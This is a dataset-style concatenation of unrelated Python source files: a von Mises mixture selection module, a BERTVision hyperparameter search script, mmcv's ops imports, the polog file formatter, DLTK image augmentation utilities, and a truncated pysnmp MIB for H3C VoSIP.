number of classes to consider
precision: float,
precision parameter of the von-mises densities
x: array fo shape(n, 3)
should be on the unit sphere
null class: bool, whether a null class should be included or not
cv_index: set of indices for cross validation
ninit: int, optional,
number of iterations
maxiter: int, optional,
bias: array of shape (n), prior
"""
score = - np.infty
mll = []
for k in krange:
mll.append( - np.infty)
for j in range(1):
ll = np.zeros_like(cv_index).astype(np.float)
for i in np.unique(cv_index):
xl = x[cv_index != i]
xt = x[cv_index == i]
bias_l = None
if bias is not None:
bias_l = bias[cv_index != i]
aux = estimate_robust_vmm(k, precision, null_class, xl,
ninit=ninit, bias=bias_l,
maxiter=maxiter)
if bias is None:
ll[cv_index == i] = np.log(aux.mixture_density(xt))
else:
bias_t = bias[cv_index == i]
lwd = aux.weighted_density(xt)
ll[cv_index == i] = np.log(lwd[:, 0] * (1 - bias_t) + \
lwd[:, 1:].sum(1) * bias_t)
if ll.mean() > mll[-1]:
mll[-1] = ll.mean()
aux = estimate_robust_vmm(k, precision, null_class, x,
ninit, bias=bias, maxiter=maxiter)
if verbose:
print k, mll[ - 1]
if mll[ - 1] > score:
best_model = aux
score = mll[ - 1]
return best_model
def sphere_density(npoints):
"""Return the points and area of a npoints**2 points sampled on a sphere
Returns
-------
s : array of shape(npoints ** 2, 3)
area: array of shape(npoints)
"""
u = np.linspace(0, 2 * np.pi, npoints + 1)[:npoints]
v = np.linspace(0, np.pi, npoints + 1)[:npoints]
s = np.vstack((np.ravel(np.outer(np.cos(u), np.sin(v))),
np.ravel(np.outer(np.sin(u), np.sin(v))),
np.ravel(np.outer(np.ones(np.size(u)), np.cos(v))))).T
area = np.abs(np.ravel(np.outer(np.ones(np.size(u)), np.sin(v)))) * \
np.pi ** 2 * 2 * 1. / (npoints ** 2)
return s, area
def example_noisy():
x1 = [0.6, 0.48, 0.64]
x2 = [-0.8, 0.48, 0.36]
x3 = [0.48, 0.64, -0.6]
x = np.random.randn(200, 3) * .1
x[:30] += x1
x[40:150] += x2
x[150:] += x3
x = (x.T / np.sqrt(np.sum(x ** 2, 1))).T
precision = 100.
vmm = select_vmm(range(2, 7), precision, True, x)
vmm.show(x)
# check that it sums to 1
s, area = sphere_density(100)
print (vmm.mixture_density(s) * area).sum()
def example_cv_nonoise():
x1 = [0.6, 0.48, 0.64]
x2 = [-0.8, 0.48, 0.36]
x3 = [0.48, 0.64, -0.6]
x = np.random.randn(30, 3) * .1
x[0::3] += x1
x[1::3] += x2
x[2::3] += x3
x = (x.T / np.sqrt(np.sum(x ** 2, 1))).T
precision = 50.
sub = np.repeat(np.arange(10), 3)
vmm = select_vmm_cv(range(1, 8), precision, x, cv_index=sub,
null_class=False, ninit=20)
vmm.show(x)
# check that it sums to 1
s, area = sphere_density(100)
return vmm
| 30.432494 | 76 | 0.501466 |
dbfb4cf457e5004a491a3c5ca35f5144c053495e
| 5,777 |
py
|
Python
|
code/torch/models/ap_glue/__main__hyperopt.py
|
siduojiang/BERTVision
|
9d0d4856300973488ead67e2d06e243bf07447ad
|
[
"MIT"
] | 5 |
2020-08-06T10:12:08.000Z
|
2022-03-17T10:38:40.000Z
|
code/torch/models/ap_glue/__main__hyperopt.py
|
siduojiang/BERTVision
|
9d0d4856300973488ead67e2d06e243bf07447ad
|
[
"MIT"
] | 9 |
2020-06-23T16:57:52.000Z
|
2021-01-17T01:52:45.000Z
|
code/torch/models/ap_glue/__main__hyperopt.py
|
cbenge509/BERTVision
|
01519bea0882fa72e86a1b62f2d0d52d22c26dfc
|
[
"MIT"
] | null | null | null |
# packages
import sys, os, random
sys.path.append("C:/BERTVision/code/torch")
from data.h5_processors.h5_processors import *
from utils.compress_utils import AdapterPooler, AP_GLUE
from common.trainers.H5_glue_trainer import H5_GLUE_Trainer
from models.ap_glue.args import get_args
import numpy as np
import torch
import torch.nn as nn
from torch.cuda.amp import GradScaler
from transformers import AdamW, get_linear_schedule_with_warmup, BertTokenizerFast
from loguru import logger
from torch.nn import MSELoss
if __name__ == '__main__':
# define an objective function
def objective(opt_args):
args = get_args()
adapter_dim, learning_rate, seed = opt_args
print("adapter_dim: %s, learning_rate: %s, seed: %s" %(str(adapter_dim), str(learning_rate), str(seed)))
# add some configs depending on checkpoint chosen
if args.checkpoint == 'bert-base-uncased':
args.n_layers = 13
args.n_features = 768
elif args.checkpoint == 'bert-large-uncased':
args.n_layers = 25
args.n_features = 1024
# instantiate data set map; pulls the right processor / data for the task
dataset_map = {
'AP_MSR': MSRH5Processor,
'AP_CoLA': COLAH5Processor,
'AP_MNLI': MNLIH5Processor,
'AP_QNLI': QNLIH5Processor,
'AP_QQP': QQPH5Processor,
'AP_RTE': RTEH5Processor,
'AP_SST': SSTH5Processor,
'AP_STSB': STSBH5Processor,
'AP_WNLI': WNLIH5Processor
}
# tell the CLI user that they mistyped the data set
if args.model not in dataset_map:
raise ValueError('Unrecognized dataset')
# set the location for saving the model
save_path = os.path.join(args.save_path, args.checkpoint, args.model)
os.makedirs(save_path, exist_ok=True)
# set the location for saving the log
log_path = os.path.join(args.log_path, args.checkpoint, args.model)
os.makedirs(log_path, exist_ok=True)
# initialize logging
logger.add(log_path + '\\' + args.model + '.log', rotation="10 MB")
logger.info(f"Training model {args.model} on this checkpoint: {args.checkpoint}")
# set device to gpu/cpu
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# detect number of gpus
n_gpu = torch.cuda.device_count()
args.device = device
args.n_gpu = n_gpu
# turn on autocast for fp16
torch.cuda.amp.autocast(enabled=True)
# set grad scaler
scaler = GradScaler()
# set seed for reproducibility
torch.backends.cudnn.deterministic = True
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
# set seed for multi-gpu
if n_gpu > 0:
torch.cuda.manual_seed_all(seed)
# instantiate model and attach it to device
model = AP_GLUE(n_layers=args.n_layers, n_batch_sz=args.batch_size, n_tokens=args.max_seq_length, n_features=args.n_features, n_labels=args.num_labels, adapter_dim = adapter_dim).to(device)
# set data set processor
processor = dataset_map[args.model]
# use it to create the train set
train_processor = processor(type='train', args=args)
# set loss
if args.num_labels == 1:
criterion = nn.MSELoss()
else:
criterion = nn.CrossEntropyLoss()
# find number of optim. steps
num_train_optimization_steps = int(len(train_processor) / args.batch_size) * args.epochs
# print metrics
logger.info(f"Device: {str(device).upper()}")
logger.info(f"Number of GPUs: {n_gpu}")
# for multi-GPU
if n_gpu > 1:
model = torch.nn.DataParallel(model)
# set optimizer
param_optimizer = list(model.named_parameters())
# exclude these from regularization
no_decay = ['bias']
# give l2 regularization to any parameter that is not named after no_decay list
# give no l2 regulariation to any bias parameter or layernorm bias/weight
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': args.l2},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}]
# set optimizer
optimizer = AdamW(optimizer_grouped_parameters,
lr=learning_rate,
correct_bias=False,
weight_decay=args.l2)
# set linear scheduler
scheduler = get_linear_schedule_with_warmup(optimizer, num_training_steps=num_train_optimization_steps,
num_warmup_steps=args.warmup_proportion * num_train_optimization_steps)
# initialize the trainer
trainer = H5_GLUE_Trainer(model, criterion, optimizer, processor, scheduler, args, scaler, logger)
# begin training / shift to trainer class
trainer.train()
# load the checkpoint
model = torch.load(trainer.snapshot_path)
return -trainer.dev_acc
# define a search space
from hyperopt import hp
adapter_dims = [2**x for x in range(3,9)]
space = [hp.choice('adapter_size', adapter_dims),
hp.uniform('learning_rate', 1e-6, 1e-3),
hp.uniformint("seed",1,2000)]
# minimize the objective over the space
from hyperopt import fmin, tpe
best = fmin(objective, space, algo=tpe.suggest, max_evals=8 * 60 * 60 / 60)
print (best)
# main fun.
# set default configuration in args.py
| 37.75817 | 197 | 0.634759 |
24faba8878e69e1ebd8cbacabcc9566295c6dcab
| 2,769 |
py
|
Python
|
mmcv/ops/__init__.py
|
liuyanyi/mmcv
|
f021af6000a52ad3108873f124d89dad93512863
|
[
"Apache-2.0"
] | null | null | null |
mmcv/ops/__init__.py
|
liuyanyi/mmcv
|
f021af6000a52ad3108873f124d89dad93512863
|
[
"Apache-2.0"
] | null | null | null |
mmcv/ops/__init__.py
|
liuyanyi/mmcv
|
f021af6000a52ad3108873f124d89dad93512863
|
[
"Apache-2.0"
] | null | null | null |
from .bbox import bbox_overlaps
from .box_iou_rotated import box_iou_rotated
from .carafe import CARAFE, CARAFENaive, CARAFEPack, carafe, carafe_naive
from .cc_attention import CrissCrossAttention
from .corner_pool import CornerPool
from .deform_conv import DeformConv2d, DeformConv2dPack, deform_conv2d
from .deform_roi_pool import (DeformRoIPool, DeformRoIPoolPack,
ModulatedDeformRoIPoolPack, deform_roi_pool)
from .deprecated_wrappers import Conv2d_deprecated as Conv2d
from .deprecated_wrappers import ConvTranspose2d_deprecated as ConvTranspose2d
from .deprecated_wrappers import Linear_deprecated as Linear
from .deprecated_wrappers import MaxPool2d_deprecated as MaxPool2d
from .focal_loss import (SigmoidFocalLoss, SoftmaxFocalLoss,
sigmoid_focal_loss, softmax_focal_loss)
from .info import (get_compiler_version, get_compiling_cuda_version,
get_onnxruntime_op_path)
from .masked_conv import MaskedConv2d, masked_conv2d
from .modulated_deform_conv import (ModulatedDeformConv2d,
ModulatedDeformConv2dPack,
modulated_deform_conv2d)
from .nms import batched_nms, nms, nms_match, nms_rotated, soft_nms
from .point_sample import (SimpleRoIAlign, point_sample,
rel_roi_point_to_rel_img_point)
from .psa_mask import PSAMask
from .roi_align import RoIAlign, roi_align
from .roi_pool import RoIPool, roi_pool
from .saconv import SAConv2d
from .sync_bn import SyncBatchNorm
from .tin_shift import TINShift, tin_shift
from .batched_rnms import batched_nms_rotated, batched_nms_rotated_ver2
from .polygon_geo import polygon_iou
from .feature_refine_module import FeatureRefineModule
__all__ = [
'bbox_overlaps', 'CARAFE', 'CARAFENaive', 'CARAFEPack', 'carafe',
'carafe_naive', 'CornerPool', 'DeformConv2d', 'DeformConv2dPack',
'deform_conv2d', 'DeformRoIPool', 'DeformRoIPoolPack',
'ModulatedDeformRoIPoolPack', 'deform_roi_pool', 'SigmoidFocalLoss',
'SoftmaxFocalLoss', 'sigmoid_focal_loss', 'softmax_focal_loss',
'get_compiler_version', 'get_compiling_cuda_version',
'get_onnxruntime_op_path', 'MaskedConv2d', 'masked_conv2d',
'ModulatedDeformConv2d', 'ModulatedDeformConv2dPack',
'modulated_deform_conv2d', 'batched_nms', 'nms', 'soft_nms', 'nms_match',
'RoIAlign', 'roi_align', 'RoIPool', 'roi_pool', 'SyncBatchNorm', 'Conv2d',
'ConvTranspose2d', 'Linear', 'MaxPool2d', 'CrissCrossAttention', 'PSAMask',
'point_sample', 'rel_roi_point_to_rel_img_point', 'SimpleRoIAlign',
'SAConv2d', 'TINShift', 'tin_shift', 'box_iou_rotated', 'nms_rotated',
'batched_nms_rotated', 'batched_nms_rotated_ver2', 'polygon_iou',
'FeatureRefineModule'
]
| 54.294118 | 79 | 0.763814 |
66fadaab0951d411432e75b7096de1d7cb006fa0
| 6,526 |
py
|
Python
|
polog/handlers/file/base_formatter.py
|
pomponchik/polog
|
104c5068a65b0eaeab59327aac1a583e2606e77e
|
[
"MIT"
] | 30 |
2020-07-16T16:52:46.000Z
|
2022-03-24T16:56:29.000Z
|
polog/handlers/file/base_formatter.py
|
pomponchik/polog
|
104c5068a65b0eaeab59327aac1a583e2606e77e
|
[
"MIT"
] | 6 |
2021-02-07T22:08:01.000Z
|
2021-12-07T21:56:46.000Z
|
polog/handlers/file/base_formatter.py
|
pomponchik/polog
|
104c5068a65b0eaeab59327aac1a583e2606e77e
|
[
"MIT"
] | 4 |
2020-12-22T07:05:34.000Z
|
2022-03-24T16:56:50.000Z
|
from polog.core.stores.levels import Levels
from polog.handlers.file.base_formatter_fields_extractors import BaseFormatterFieldsExtractors
class BaseFormatter:
"""
Здесь происходит преобразование исходных данных в строку, которая будет записана в файл.
"""
# Названия полей исходного словаря с данными, которые игнорируются.
# Их содержимое никак не видоизменяется.
FORBIDDEN_EXTRA_FIELDS = {
'module',
'service_name',
'exception_type',
'exception_message',
}
def __init__(self, separator):
"""
Первый этап инициализации объекта - при его создании.
Инициализация объекта разделена на 2 этапа.
Первый этап - при создании объекта, второй - при записи первого лога.
В данном случае мы опираемся на то, что пользователь обязан завершить настройку логгера до его первого вызова. То есть до первого вызова мы не знаем в точности все настройки. Поэтому окончательно все настройки фиксируются только при первом вызове.
separator - разделитель между строками логов, обычно "\n".
"""
self.separator = separator
def __init_on_run__(self):
"""
Второй этап инициализации объекта - при первом вызове метода .get_formatted_string().
Данный метод будет вызван только один раз, после чего он больше не будет нужен.
"""
self.FIELD_HANDLERS = self.get_base_field_handlers()
self.ALIGN_NORMS = self.get_align_norms()
def get_formatted_string(self, log):
"""
При первом вызове данного метода он будет переопределен методом _get_formatted_string().
Здесь происходит вызов вторичной инициализации объекта, после чего происходит запись лога и метод становится не нужным.
"""
self.__init_on_run__()
result = self._get_formatted_string(log)
self.get_formatted_string = self._get_formatted_string
return result
def _get_formatted_string(self, log):
"""
Начиная со второго вызова метода get_formatted_string(), будет сразу вызван данный метод, т. к. он заменит собою get_formatted_string().
Форматирование лога происходит в 3 этапа:
1. Формирование словаря с подстроками.
2. Форматирование подстрок по ширине.
3. Создание одной большой строки из нескольких "кусочков".
"""
data = self.get_dict(log)
self.width_and_align(data)
result = self.format(data)
return result
def get_base_field_handlers(self):
"""
Данный метод срабатывает на 2 этапе инициализации.
Возвращает словарь, где ключи - названия исходных полей лога (не обязательно исходных полей, поле может быть создано с таким названием), а значения - некие функции, которые берут исходные данные и делают из них некую подстроку, т. е. кусочек будущего лога. Эти кусочки позднее будут склеены, в другом методе.
"""
result = {
'time': BaseFormatterFieldsExtractors.time,
'level': BaseFormatterFieldsExtractors.level,
'success': BaseFormatterFieldsExtractors.success,
'auto': BaseFormatterFieldsExtractors.auto,
'message': BaseFormatterFieldsExtractors.message,
'function': BaseFormatterFieldsExtractors.function,
'time_of_work': BaseFormatterFieldsExtractors.time_of_work,
'input_variables': BaseFormatterFieldsExtractors.input_variables,
'local_variables': BaseFormatterFieldsExtractors.local_variables,
'result': BaseFormatterFieldsExtractors.result,
'exception': BaseFormatterFieldsExtractors.exception,
'traceback': BaseFormatterFieldsExtractors.traceback,
}
return result
def get_align_norms(self):
"""
Часть второго этапа инициализации. Возвращаем словарь с правилами выравнивания для отдельных полей.
Значения в словаре - кортежи из 2-х элементов.
Первый элемент каждого кортежа - ширина поля. Если исходный контент меньше, он будет дополнен пробелами.
Второй элемент - индикатор выравнивания (см. https://www.python.org/dev/peps/pep-3101/#standard-format-specifiers).
"""
result = {
'level': (max(max([len(x) for x in Levels.get_all_names()], default=2), len('UNKNOWN')), '^'), # Длина самого длинного названия уровня логирования.
'success': (7, '^'),
'auto': (6, '^'),
}
return result
def get_dict(self, log):
"""
Из исходных данных формируем словарь, заполненный только нужными полями, в уже отформатированном виде.
Потом останется этот словарь только "склеить" в одну строку.
"""
result = {}
self.add_base_fields(result, log)
self.add_extra_fields(result, log)
return result
def add_base_fields(self, base, log):
"""
Базовые поля - это те, для которых прописаны специальные обработчики в self.FIELD_HANDLERS.
Здесь мы вызываем все эти обработчики.
"""
for field_name, extractor in self.FIELD_HANDLERS.items():
try:
value = extractor(log)
except:
try:
value = str(log[field_name])
except:
value = None
if value is not None:
base[field_name] = value
def add_extra_fields(self, base, log):
"""
Добавляем в словарь с данными поля, отсутствующие в self.FIELD_HANDLERS.
"""
for field_name, value in log.items():
if field_name not in base:
if field_name not in self.FORBIDDEN_EXTRA_FIELDS:
if value is not None:
base[field_name] = f'{field_name}: "{value}"'
def format(self, data):
"""
Берем словарь с уже отформатированными данными и делаем из него строку.
"""
values = data.values()
return ' | '.join(values) + self.separator
def width_and_align(self, data):
"""
Для некоторых полей заданы нормы форматирования (self.ALIGN_NORMS). Здесь происходит применение этих норм.
data - словарь с полями лога.
"""
for field_name in self.ALIGN_NORMS:
item = data.get(field_name, None)
if item is not None:
width, align = self.ALIGN_NORMS[field_name]
value = f'{item:{align}{width}}'
data[field_name] = value
| 41.833333 | 316 | 0.646184 |
7a944e38333ac85d32ef53e74b9bb1188da86627
| 10,589 |
py
|
Python
|
dltk/io/augmentation.py
|
UncleStotheh/DLTK
|
e1591629d45459c0739ad89aea8cd5484221df7a
|
[
"Apache-2.0"
] | 1,397 |
2017-05-02T15:41:18.000Z
|
2022-03-26T20:40:09.000Z
|
dltk/io/augmentation.py
|
UncleStotheh/DLTK
|
e1591629d45459c0739ad89aea8cd5484221df7a
|
[
"Apache-2.0"
] | 50 |
2017-06-13T15:43:04.000Z
|
2022-02-09T23:26:31.000Z
|
dltk/io/augmentation.py
|
UncleStotheh/DLTK
|
e1591629d45459c0739ad89aea8cd5484221df7a
|
[
"Apache-2.0"
] | 436 |
2017-06-12T20:56:02.000Z
|
2022-03-09T15:00:43.000Z
|
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import numpy as np
from scipy.ndimage.interpolation import map_coordinates
from scipy.ndimage.filters import gaussian_filter
def flip(imagelist, axis=1):
"""Randomly flip spatial dimensions
Args:
imagelist (np.ndarray or list or tuple): image(s) to be flipped
axis (int): axis along which to flip the images
Returns:
np.ndarray or list or tuple: same as imagelist but randomly flipped
along axis
"""
# Check if a single image or a list of images has been passed
was_singular = False
if isinstance(imagelist, np.ndarray):
imagelist = [imagelist]
was_singular = True
# With a probility of 0.5 flip the image(s) across `axis`
do_flip = np.random.random(1)
if do_flip > 0.5:
for i in range(len(imagelist)):
imagelist[i] = np.flip(imagelist[i], axis=axis)
if was_singular:
return imagelist[0]
return imagelist
def add_gaussian_offset(image, sigma=0.1):
"""
Add Gaussian offset to an image. Adds the offset to each channel
independently.
Args:
image (np.ndarray): image to add noise to
sigma (float): stddev of the Gaussian distribution to generate noise
from
Returns:
np.ndarray: same as image but with added offset to each channel
"""
offsets = np.random.normal(0, sigma, ([1] * (image.ndim - 1) + [image.shape[-1]]))
image += offsets
return image
def add_gaussian_noise(image, sigma=0.05):
"""
Add Gaussian noise to an image
Args:
image (np.ndarray): image to add noise to
sigma (float): stddev of the Gaussian distribution to generate noise
from
Returns:
np.ndarray: same as image but with added offset to each channel
"""
image += np.random.normal(0, sigma, image.shape)
return image
def elastic_transform(image, alpha, sigma):
"""
Elastic deformation of images as described in [1].
[1] Simard, Steinkraus and Platt, "Best Practices for Convolutional
Neural Networks applied to Visual Document Analysis", in Proc. of the
International Conference on Document Analysis and Recognition, 2003.
Based on gist https://gist.github.com/erniejunior/601cdf56d2b424757de5
Args:
image (np.ndarray): image to be deformed
alpha (list): scale of transformation for each dimension, where larger
values have more deformation
sigma (list): Gaussian window of deformation for each dimension, where
smaller values have more localised deformation
Returns:
np.ndarray: deformed image
"""
assert len(alpha) == len(sigma), \
"Dimensions of alpha and sigma are different"
channelbool = image.ndim - len(alpha)
out = np.zeros((len(alpha) + channelbool, ) + image.shape)
# Generate a Gaussian filter, leaving channel dimensions zeroes
for jj in range(len(alpha)):
array = (np.random.rand(*image.shape) * 2 - 1)
out[jj] = gaussian_filter(array, sigma[jj],
mode="constant", cval=0) * alpha[jj]
# Map mask to indices
shapes = list(map(lambda x: slice(0, x, None), image.shape))
grid = np.broadcast_arrays(*np.ogrid[shapes])
indices = list(map((lambda x: np.reshape(x, (-1, 1))), grid + np.array(out)))
# Transform image based on masked indices
transformed_image = map_coordinates(image, indices, order=0,
mode='reflect').reshape(image.shape)
return transformed_image
def extract_class_balanced_example_array(image,
label,
example_size=[1, 64, 64],
n_examples=1,
classes=2,
class_weights=None):
"""Extract training examples from an image (and corresponding label) subject
to class balancing. Returns an image example array and the
corresponding label array.
Args:
image (np.ndarray): image to extract class-balanced patches from
label (np.ndarray): labels to use for balancing the classes
example_size (list or tuple): shape of the patches to extract
n_examples (int): number of patches to extract in total
classes (int or list or tuple): number of classes or list of classes
to extract
Returns:
np.ndarray, np.ndarray: class-balanced patches extracted from full
images with the shape [batch, example_size..., image_channels]
"""
assert image.shape[:-1] == label.shape, 'Image and label shape must match'
assert image.ndim - 1 == len(example_size), \
'Example size doesnt fit image size'
assert all([i_s >= e_s for i_s, e_s in zip(image.shape, example_size)]), \
'Image must be larger than example shape'
rank = len(example_size)
if isinstance(classes, int):
classes = tuple(range(classes))
n_classes = len(classes)
assert n_examples >= n_classes, \
'n_examples need to be greater than n_classes'
if class_weights is None:
n_ex_per_class = np.ones(n_classes).astype(int) * int(np.round(n_examples / n_classes))
else:
assert len(class_weights) == n_classes, \
'Class_weights must match number of classes'
class_weights = np.array(class_weights)
n_ex_per_class = np.round((class_weights / class_weights.sum()) * n_examples).astype(int)
# Compute an example radius to define the region to extract around a
# center location
ex_rad = np.array(list(zip(np.floor(np.array(example_size) / 2.0),
np.ceil(np.array(example_size) / 2.0))),
dtype=np.int)
class_ex_images = []
class_ex_lbls = []
min_ratio = 1.
for c_idx, c in enumerate(classes):
# Get valid, random center locations belonging to that class
idx = np.argwhere(label == c)
ex_images = []
ex_lbls = []
if len(idx) == 0 or n_ex_per_class[c_idx] == 0:
class_ex_images.append([])
class_ex_lbls.append([])
continue
# Extract random locations
r_idx_idx = np.random.choice(len(idx),
size=min(n_ex_per_class[c_idx], len(idx)),
replace=False).astype(int)
r_idx = idx[r_idx_idx]
# Shift the random to valid locations if necessary
r_idx = np.array(
[np.array([max(min(r[dim], image.shape[dim] - ex_rad[dim][1]),
ex_rad[dim][0]) for dim in range(rank)])
for r in r_idx])
for i in range(len(r_idx)):
# Extract class-balanced examples from the original image
slicer = [slice(r_idx[i][dim] - ex_rad[dim][0], r_idx[i][dim] + ex_rad[dim][1]) for dim in range(rank)]
ex_image = image[slicer][np.newaxis, :]
ex_lbl = label[slicer][np.newaxis, :]
# Concatenate them and return the examples
ex_images = np.concatenate((ex_images, ex_image), axis=0) \
if (len(ex_images) != 0) else ex_image
ex_lbls = np.concatenate((ex_lbls, ex_lbl), axis=0) \
if (len(ex_lbls) != 0) else ex_lbl
class_ex_images.append(ex_images)
class_ex_lbls.append(ex_lbls)
ratio = n_ex_per_class[c_idx] / len(ex_images)
min_ratio = ratio if ratio < min_ratio else min_ratio
indices = np.floor(n_ex_per_class * min_ratio).astype(int)
ex_images = np.concatenate([cimage[:idxs] for cimage, idxs in zip(class_ex_images, indices)
if len(cimage) > 0], axis=0)
ex_lbls = np.concatenate([clbl[:idxs] for clbl, idxs in zip(class_ex_lbls, indices)
if len(clbl) > 0], axis=0)
return ex_images, ex_lbls
def extract_random_example_array(image_list,
example_size=[1, 64, 64],
n_examples=1):
"""Randomly extract training examples from image (and a corresponding label).
Returns an image example array and the corresponding label array.
Args:
image_list (np.ndarray or list or tuple): image(s) to extract random
patches from
example_size (list or tuple): shape of the patches to extract
n_examples (int): number of patches to extract in total
Returns:
np.ndarray, np.ndarray: class-balanced patches extracted from full
images with the shape [batch, example_size..., image_channels]
"""
assert n_examples > 0
was_singular = False
if isinstance(image_list, np.ndarray):
image_list = [image_list]
was_singular = True
assert all([i_s >= e_s for i_s, e_s in zip(image_list[0].shape, example_size)]), \
'Image must be bigger than example shape'
assert (image_list[0].ndim - 1 == len(example_size) or image_list[0].ndim == len(example_size)), \
'Example size doesnt fit image size'
for i in image_list:
if len(image_list) > 1:
assert (i.ndim - 1 == image_list[0].ndim or i.ndim == image_list[0].ndim or i.ndim + 1 == image_list[0].ndim),\
'Example size doesnt fit image size'
assert all([i0_s == i_s for i0_s, i_s in zip(image_list[0].shape, i.shape)]), \
'Image shapes must match'
rank = len(example_size)
# Extract random examples from image and label
valid_loc_range = [image_list[0].shape[i] - example_size[i] for i in range(rank)]
rnd_loc = [np.random.randint(valid_loc_range[dim], size=n_examples)
if valid_loc_range[dim] > 0
else np.zeros(n_examples, dtype=int) for dim in range(rank)]
examples = [[]] * len(image_list)
for i in range(n_examples):
slicer = [slice(rnd_loc[dim][i], rnd_loc[dim][i] + example_size[dim])
for dim in range(rank)]
for j in range(len(image_list)):
ex_image = image_list[j][slicer][np.newaxis]
# Concatenate and return the examples
examples[j] = np.concatenate((examples[j], ex_image), axis=0) \
if (len(examples[j]) != 0) else ex_image
if was_singular:
return examples[0]
return examples
| 36.89547 | 123 | 0.615167 |
340f0c88d7b5d26db2a6fd1f8411a98f923e5dfe
| 12,813 |
py
|
Python
|
pysnmp/H3C-VOSIP-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 11 |
2021-02-02T16:27:16.000Z
|
2021-08-31T06:22:49.000Z
|
pysnmp/H3C-VOSIP-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 75 |
2021-02-24T17:30:31.000Z
|
2021-12-08T00:01:18.000Z
|
pysnmp/H3C-VOSIP-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10 |
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module H3C-VOSIP-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/H3C-VOSIP-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 19:11:30 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsIntersection, ValueRangeConstraint, SingleValueConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsIntersection", "ValueRangeConstraint", "SingleValueConstraint", "ConstraintsUnion")
h3cVoice, = mibBuilder.importSymbols("HUAWEI-3COM-OID-MIB", "h3cVoice")
InetAddress, InetAddressType = mibBuilder.importSymbols("INET-ADDRESS-MIB", "InetAddress", "InetAddressType")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
Bits, MibIdentifier, Counter32, ObjectIdentity, NotificationType, Unsigned32, IpAddress, Integer32, iso, TimeTicks, Counter64, ModuleIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "Bits", "MibIdentifier", "Counter32", "ObjectIdentity", "NotificationType", "Unsigned32", "IpAddress", "Integer32", "iso", "TimeTicks", "Counter64", "ModuleIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Gauge32")
DisplayString, RowStatus, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "RowStatus", "TextualConvention")
h3cVoSIP = ModuleIdentity((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12))
h3cVoSIP.setRevisions(('2005-03-15 00:00',))
if mibBuilder.loadTexts: h3cVoSIP.setLastUpdated('200503150000Z')
if mibBuilder.loadTexts: h3cVoSIP.setOrganization('Huawei 3Com Technologies co., Ltd.')
class SipMsgType(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8))
namedValues = NamedValues(("unknown", 1), ("register", 2), ("invite", 3), ("ack", 4), ("prack", 5), ("cancel", 6), ("bye", 7), ("info", 8))
h3cSIPClientMIB = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1))
h3cSIPClientConfigObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 1))
h3cSIPID = MibScalar((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 32))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cSIPID.setStatus('current')
h3cSIPPasswordType = MibScalar((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("simple", 1), ("cipher", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cSIPPasswordType.setStatus('current')
h3cSIPPassword = MibScalar((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 1, 3), OctetString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cSIPPassword.setStatus('current')
h3cSIPSourceIPAddressType = MibScalar((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 1, 4), InetAddressType()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cSIPSourceIPAddressType.setStatus('current')
h3cSIPSourceIP = MibScalar((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 1, 5), InetAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cSIPSourceIP.setStatus('current')
h3cSIPRegisterMode = MibScalar((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("gatewayAll", 1), ("gatewaySingle", 2), ("phoneNumber", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cSIPRegisterMode.setStatus('current')
